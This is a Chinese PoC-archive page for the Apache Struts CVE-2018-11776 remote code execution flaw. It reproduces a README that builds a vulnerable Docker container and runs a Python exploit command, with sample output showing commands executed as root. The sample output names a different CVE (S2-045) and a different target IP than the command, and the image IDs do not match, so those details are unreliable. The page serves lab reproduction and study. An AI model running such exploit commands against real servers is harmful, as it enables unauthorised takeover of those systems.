关联漏洞
标题:
Apache Struts 输入验证错误漏洞
(CVE-2018-11776)
描述:Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。Apache Struts 2是Apache Struts的下一代产品,是在Struts 1和WebWork的技术基础上进行了合并的全新Struts 2框架,其体系结构与Struts 1差别较大。 Apache Struts 2.3版本至2.3.34版本和2.5版本至2.5.16版本中存在输入验证漏洞
介绍
<h3> Apache Struts CVE-2018-11776 Python PoC</h3>
<p>
This is based on https://github.com/hook-s3c/CVE-2018-11776-Python-PoC. The container build and instructions did not work as described in the README so this fork was created. The POC exploit used is from Rapid7.
</p>
<p>
Shoutout:
</p>
<p>
hook-s3c (github.com/hook-s3c), @hook_s3c on twitter <br>
Rapid7 https://github.com/rapid7/metasploit-framework/issues/8064
</p>
<h3>Introduction</h3>
<p>
Man Yue Mo from Semmle has disclosed an Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request.
</p>
<p>
Versions affected are 2.3 to 2.3.34, and 2.5 to 2.5.16.
</p>
<p>
Default configuration is not vulnerable. This container, and many others, are vulnerable.
</p>
<h3>Step 1 - Build the Container</h3>
<p>
It's preferrable to build a container from a Dockerfile when you can see what is going into the build.
</p>
<br>
<code>
git clone https://github.com/freshdemo/ApacheStruts-CVE-2018-11776 ./Struts
</code>
<br>
<code>
cd Struts
</code>
<br>
<code>
docker build . -t freshdemo/apachestruts
</code>
<br><br>
<p>
Find the new container with
</p>
<br>
<code>
docker images
</code>
<br><br>
<p>
The output should be similar to this, where you can get the image ID.
</p>
<br>
<pre>
root@DockerHost:~/ApacheStruts-CVE-2018-11776# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE <br>
freshdemo/apachestruts latest 6586cedf49fa About a minute ago 542MB <br>
</pre>
<br>
<h3>Step 2 - Run the Container</h3>
<p>
Build and start a container with the following.
</p>
<br>
<code>
docker run -d --name apachestruts -p 8080:8080 d39018c50afe
</code>
<br>
<h3>Step 3 - Exploit</h3>
<p>
Make sure any ingress/egress firewalls permit the port you specified earlier (8080), and run the exploit against your target with the following.
</p>
<br>
<code>
python struts.py http://192.168.2.188:8080 'id'
</code>
<br><br>
<p>
Your output should be similar to this.
</p>
<br>
<pre>
root@k:/home/s# python struts.py http://192.168.2.188:8080 'id'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
http://13.88.250.188:8080 : [*] cmd: id
uid=0(root) gid=0(root) groups=0(root) <br>
</pre>
<br>
文件快照
[4.0K] /data/pocs/8c56f2061514c4e8d7067623a26a0106df069d89
├── [ 190] Dockerfile
├── [2.0K] exploit.py
├── [2.3K] README.md
└── [ 12M] struts2-showcase-2.3.12.war
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。